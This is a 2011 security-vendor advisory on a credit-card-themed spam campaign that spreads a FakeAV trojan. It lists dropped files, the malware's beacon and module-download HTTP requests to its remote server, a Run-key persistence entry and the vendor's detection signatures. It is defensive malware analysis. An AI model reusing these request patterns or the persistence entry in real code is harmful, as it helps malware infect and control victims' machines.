Financial spam campaigns on the rise

July 8, 2011

SonicWALL UTM Research team continued to observe a increase in financial spam campaigns pretending to be from a credit card company. The email attempts to grab the reader's attention by stating that their credit card bill is overdue. The attachment in the email purporting to be a financial statement is a newer variant of the FakeAV we analyzed earlier.

The spam campaign is shown below:


It performs the following activities when executed:

  • It creates the following files:
    • Start MenuProgramsStartupdxdiag.exe (Copy of itself) [Detected as GAV: Aspxor.Y (Trojan)]
    • WINDOWSsystem32aspimgr.exe [Detected as GAV: Danmec.E (Trojan)]
    • WINDOWSdvcbdt1.dll [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%rrtegggggggg[1].exe [Detected as GAV: FakeAV.AHV (Trojan)]
    • %temp%gggssgsdggg[1].exe [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%bibalabibabuba[1].exe [Detected as GAV: Aspxor.Z (Trojan)]
  • It reports new infection to a remote server:
    • GET /forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609 HTTP/1.1
  • It downloads further files from a remote server using a custom user-agent string:
    • GET /forum1/load.php?module=grabbers HTTP/1.1
      User-Agent: Our_Agent
  • It creates the following registry entry to ensure infection on reboot:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Ulazebebebag "rundll32.exe "C:WINDOWSdvcbdt1.dll",Startup"
  • It displays fake scans and infections and prompts the user to purchase the product in order to clean their computer.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Oficla.FS (Trojan)
  • GAV: Oficla.FS#email (Trojan)
  • GAV: Aspxor.Y (Trojan)
  • GAV: Aspxor.Z (Trojan)
  • GAV: Danmec.E (Trojan)
  • GAV: Mufanom.BLDH (Trojan)
  • GAV: FakeAV.AHV (Trojan)